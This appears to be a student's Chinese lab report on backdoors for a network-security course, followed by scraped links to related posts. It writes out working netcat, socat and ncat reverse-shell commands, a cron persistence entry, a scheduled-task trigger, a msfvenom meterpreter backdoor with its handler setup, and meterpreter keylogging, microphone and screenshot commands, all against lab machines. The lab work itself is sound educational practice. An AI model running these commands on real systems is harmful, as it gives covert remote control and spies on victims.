220164323 Exp2 后门原理与实践

(1)例举你能想到的一个后门进入到你系统中的可能方式?
在使用盗版软件,盗版系统,甚至游戏外挂时,往往会让我们关闭杀毒软件,。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
win:任务计划启动
linux:通过cron启动
(3)Meterpreter有哪些给你映像深刻的功能?
无论是截屏,拍照,还是录音,都会泄露隐私,
(4)如何发现自己有系统有没有被安装后门?
通过查阅任务计划以及进程里是否有可疑项,安装杀毒软件也是一种方式。

Linux:192.168.38.128
Win10:192.168.1.144

学习ncat的使用

1.Win获得Linux Shell

  • Win10打开cmd命令行,在ncat解压目录下,输入ncat.exe -l -p 43234323端口进行监听
  • 在Linux终端输入nc 192.168.1.144 4323 -e /bin/sh反弹连接Windows4323端口
  • Win10已获得Linux shell 虽然windows和Linux建立了连接,但是windows上使用正确的linux指令不会显示内容,但使用错误的linux指令会在linux上报错,我一直没有找到问题在哪,改了字符集也不会显示,在之后两者进行传输消息时,windows可以传输消息给linux,但linux上的消息不会再cmd上显示,不知道原因,如果有人可以帮我找到问题的话,请告诉我

2.Linux获得Win Shell

  • Linux下打开一个终端,输入nc -l -p 43234323端口进行监听
  • 在Win命令行输入ncat.exe -e cmd.exe 192.168.38.128 4323反弹连接Linux4323端口

  • Linux已获得Win shell

3.使用nc传输信息

  • Win10命令行输入ncat.exe -l 4323监听4323端口
  • Linux终端输入nc 192.168.1.144 4323反弹连接windows4323端口

  • 建立连接后可互传信息

4.使用nc传输文件

  • Win10命令行输入ncat.exe -l 4323 > 1.txt监听5228端口,并设置收到的文件重定向保存到1.txt
  • Linux终端输入nc 192.168.1.144 4323 < 2.txt反弹连接Win104323端口

  • Win10可收到Linux发来的文件。

实验内容

任务一:使用netcat获取主机操作Shell,cron启动

1、设定cron
Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。详细说明可以"man cron"。

  • Win7中打开对端口4323端口的监听。
    ncat.exe -l -p 4323
  • Linux下使用crontab -e指令增加一条定时任务,-e表示编辑
  • 选择3,即编辑器。
    根据m分钟 h小时 dom日期 mon月 dow周几 command执行的命令的格式添加最后一行45 * * * * /bin/netcat 192.168.1.144 4323 -e /bin/sh

保存退出

任务二:使用socat获取主机操作Shell, 任务计划启动

1、新建任务计划

  • 原理: 在主控机的nc打开对4323端口的监听时,受控机的每一次锁定时都会启动ncat,相当于在cmd执行ncat.exe -e cmd.exe 192.168.1.144 4323,从而反弹连接到Linux。即Linux得到Win10 shell。
    新建触发器:当锁定任何用户的工作站时

新建操作:
启动程序:socat所在路径\socat.exe
添加参数:tcp-listen:4323 exec:cmd.exe,pty,stderr

Linux终端输入socat - tcp:192.168.1.144:4323,结果验证:

任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  • 在Linux终端执行msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168. 38.128 LPORT=4323 -f exe > 20164323_backdoor.exe生成后门程序20164323_backdoor.exe

  • Win下执行ncat.exe -l 4323 > 20164323_backdoor.exe监听4323端口,

  • Linux终端执行nc 192.168.1.144 4323 < 20164323_backdoor.exe反弹连接Win7并传输文件20164323_backdoor.exe
  • Linux终端执行msfconsole命令,并设置好IP地址和端口号

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options

  • 执行监听

  • Win运行后门程序

  • Linux平台的监听进程将获得Win主机的主动连接,并得到远程控制shell。

任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

    • record_mic录制一段音频

    • screenshot进行截屏

    • 使用screenshot指令可以进行截屏

    • 在kali中使用keyscan_start指令开始,在windows中记录下击键的过程,使用keyscan_dump指令读取击键的记录:
    • 使用getuid指令查看当前用户

    • 实验中遇到的问题

      虽然windows和Linux建立了连接,但是windows上使用正确的linux指令不会显示内容,但使用错误的linux指令会在linux上报错,我一直没有找到问题在哪,改了字符集也不会显示,在之后两者进行传输消息时,windows可以传输消息给linux,但linux上的消息不会在cmd上显示,还有生成后门时,弄混linux和windows的Ip地址造成很多次的监听错误,还有碰到防火墙还有杀毒软件的问题,之前生成的后门都被杀软杀掉了,而且没要找到传输过来的软件,最后我是利用杀毒软件找到的传输文件。

      实验感想

    • 这次的实验非常有意思,但觉得也很危险,通过这次实验更加了解了后门,同时加深了自己的警惕意识。黑客可能通过后门控制我们的电脑,通过截屏,击键记录还有摄像头来了解我们的信息,我们在平时一定要注意防范。

Exp2 后门原理与实践 20164323段钊阳的更多相关文章

  1. Exp3 免杀原理与实践 20164323段钊阳

    网络对抗技术 20164323 Exp3 免杀原理与实践 免杀 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. 要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何 ...

  2. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  3. 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...

  4. 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...

  5. 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...

  6. 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...

  7. 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...

  8. 2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 下载免费应用的时候会有绑定木马. 浏览某些网页时会有内 ...

  9. 2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践 1.基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 下载自己不熟悉的软件时含有病毒. 网络钓鱼, ...

随机推荐

  1. come on!

    团队选题与评审(团队作业 2) 队名 Rookie 团队成员的姓名与学号 211606377 覃一霸(队长) 211606346 张江波 211606371 刘治江 211606384 夏培华 211 ...

  2. leetcode434

    public class Solution { public int CountSegments(string s) { s = s.Trim(); ) { ; } else { ; ; ; i &l ...

  3. sql注入及事务

    Statement会有一个关于sql注入的bug ,所以基本不使用 一般使用PreparedStatement import java.sql.Connection;import java.sql.P ...

  4. [ML]熵、KL散度、信息增益、互信息-学习笔记

    [ML]熵.KL散度.信息增益.互信息-学习笔记 https://segmentfault.com/a/1190000000641079

  5. shell脚本通过expect脚本实现自动输入密码

     背景:在远程文件下载时,需要输入对方的服务器密码,shell不支持交互输入内容,可以用下面两种方式实现   一.在shell脚本中嵌入expect来实现密码输入 expect是一个自动交互功能的工具 ...

  6. oracle数据库在sys下直接修改用户密码

    首先用sys登录上去, 在命令窗口或者是能执行输入sql语句的地方输入下面代码, 回车就好 alter user you_username(要修改的用户名) identified by you_pas ...

  7. Unity5 Shader Stripping 导致 LightMap 全部丢失的解决方法

    当使用 SceneManager.LoadScene 的时候,会自动载入LightMap 和 NavMesh的数据.然后再对MeshRender 进行指定 LightMapIndex 以及 Light ...

  8. C和C++中的不定参数

    在初学C的时候,我们都会用到printf函数来写Hello World的程序.在我们看printf函数的声明时,会看到类似于下面代码 int printf(const char * __restric ...

  9. WSTMart商城系统数据字典

    欢迎来到WSTMart官网  开源多用户商城  QQ交流群: 返回首页|返回首页| 开发手册 | 数据库字典 | 授权查询 | 授权用户登录 | 官方微信扫一扫 x QQ客服 服务热线 020-852 ...

  10. win10下安装centos7双系统

    国庆最后一天了,闲来无事装个双系统,用虚拟机的linux总有些不方便. window下安装linux双系统有两中方法: 1.U盘安装 (我采用的方法,后面详述) 2.EasyBCD工具安装 (使用Ea ...